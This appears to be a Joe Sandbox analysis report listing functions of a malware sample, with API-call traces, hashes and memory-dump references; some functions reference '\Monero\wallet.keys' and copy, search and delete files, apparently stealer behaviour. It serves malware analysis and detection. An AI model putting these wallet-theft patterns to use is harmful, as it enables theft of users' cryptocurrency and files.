Instruction ID: a0ce335230ddef4dc80a68926019a94167f477e8948d8c40e93e105b980989b0
Opcode Fuzzy Hash: 642a2b18463b17687ee066117ac7a2923277d87c4c6d2c7d626dd4cc9a4b50e8
Instruction Fuzzy Hash: 77F0FB7191010866EF48F7B8DC569ED773CFA56300F404168B457E2D92EF386A09C6A3

Function 008A7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(008B0E2C), ref: 008A7F00
wsprintfA.USER32 ref: 008A7F16

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 3f27353d2d088b31e92c1e987d743e360c2906f7b7e7884d2c0633ea55d3032e
Instruction ID: 82015a53743c8531b67178aa748ae2a0a584386ededddda84f0098e5ff3e5403
Opcode Fuzzy Hash: 3f27353d2d088b31e92c1e987d743e360c2906f7b7e7884d2c0633ea55d3032e
Instruction Fuzzy Hash: 16F06DB1A04218EBDB10CF84DC45FAAF7BCFB49B24F00066AF515E2680D7796A048BE1

Function 0089B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

lstrlen.KERNEL32(00000000), ref: 0089B9C2
lstrlen.KERNEL32(00000000), ref: 0089B9D6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 19c86559d71dc6c56b65c110ffa15a676228cc790f29559707e26df2e450cce5
Instruction ID: 291e679469850607f5003620d74f493d4d4cdea969b2e4d8f4836a24a635063a
Opcode Fuzzy Hash: 19c86559d71dc6c56b65c110ffa15a676228cc790f29559707e26df2e450cce5
Instruction Fuzzy Hash: 5EE1ED729101189BEB48EBA8CC96DEE7338FF15300F444169F517E6991EF386A49CB63

Function 0089AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

lstrlen.KERNEL32(00000000), ref: 0089B16A
lstrlen.KERNEL32(00000000), ref: 0089B17E

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 1029f73555acb9edcb1176547c79d8ee146c6a47e4468757acc1a01968215e70
Instruction ID: 195de542f633c786fc6e420e16e3b3f27caa59a96485815616442bad043dfe61
Opcode Fuzzy Hash: 1029f73555acb9edcb1176547c79d8ee146c6a47e4468757acc1a01968215e70
Instruction Fuzzy Hash: 6891FE729101089BEF48EBA8DC95DEE7378FF15300F444169B517E6991EF386A09CBA3

Function 0089B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

lstrlen.KERNEL32(00000000), ref: 0089B42E
lstrlen.KERNEL32(00000000), ref: 0089B442

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 1b5bfde9f41e31a8ee57585749df0a2da4a7502e007026e8b2823ee2e4198423
Instruction ID: ad70cc0763dbd158a135676a8ae0a16c8355ebde77256d8d7533ee08bdabb2d0
Opcode Fuzzy Hash: 1b5bfde9f41e31a8ee57585749df0a2da4a7502e007026e8b2823ee2e4198423
Instruction Fuzzy Hash: C2711B719101089AEB48FBA8DD96DEE7378FF55300F444129B513E6991EF386A09CBA3

Function 008A4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4BEA
lstrcat.KERNEL32(?,0142DCA0), ref: 008A4C08

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
Part of subcall function 008A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
Part of subcall function 008A4910: FindClose.KERNEL32(000000FF), ref: 008A4B92

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49B0
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B08D2), ref: 008A49C5
Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49E2
Part of subcall function 008A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008A4A1E
Part of subcall function 008A4910: lstrcat.KERNEL32(?,0142E8F8), ref: 008A4A4A
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FF8), ref: 008A4A5C
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A70
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FFC), ref: 008A4A82
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A96
Part of subcall function 008A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008A4AAC
Part of subcall function 008A4910: DeleteFileA.KERNEL32(?), ref: 008A4B31

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A4A07

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 2d2ac6bf7f89ca143c7bc0e4c8bd75c75ab92458beea287493fc1cebcdd02bbf
Instruction ID: 3260180497b73a1d68b07b76ba2bda1d3ad4b0475a48ee5e12b2cfa08d9cebe4
Opcode Fuzzy Hash: 2d2ac6bf7f89ca143c7bc0e4c8bd75c75ab92458beea287493fc1cebcdd02bbf
Instruction Fuzzy Hash: DC41F7BB9001046BDB94F7A8EC46EEE333DF795300F008509B547D6685EE755B898BA3

Function 00896660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00896706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00896753

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 47b4538867593c7c65e31fac6a26e2024703f45249e8e3a7810c2afb6d433d8e
Instruction ID: ffb87c3417487683e16f69af57bb141ac2b3afce4d5123c8037d3ae015ae208c
Opcode Fuzzy Hash: 47b4538867593c7c65e31fac6a26e2024703f45249e8e3a7810c2afb6d433d8e
Instruction Fuzzy Hash: AB41D874A00209EFCB44DF98C494BADBBB1FF58314F2482A9E9599B345D731EA91CF84

Function 008A5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A508A
lstrcat.KERNEL32(?,0142E368), ref: 008A50A8

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 275038fa24845e8aaddc8c183247612f10ca817fc65fa04d4e1d5ad2c6d33c15
Instruction ID: 3a7978f84420f72361eae2cdafd26f54c5f5a14a511ba7c8a864ae7e9d6efe85
Opcode Fuzzy Hash: 275038fa24845e8aaddc8c183247612f10ca817fc65fa04d4e1d5ad2c6d33c15
